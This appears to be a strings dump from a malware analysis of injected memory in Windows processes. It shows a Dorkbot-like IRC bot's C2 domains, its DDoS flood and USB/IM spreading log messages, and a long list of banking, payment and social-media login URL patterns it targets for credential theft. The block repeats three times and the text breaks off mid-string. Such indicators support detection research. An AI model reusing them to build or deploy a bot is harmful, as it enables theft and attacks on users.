%d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>\??\%System%\winlogon.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>services.exe_752_rwx_00E30000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\services.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\services.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_948_rwx_009F0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 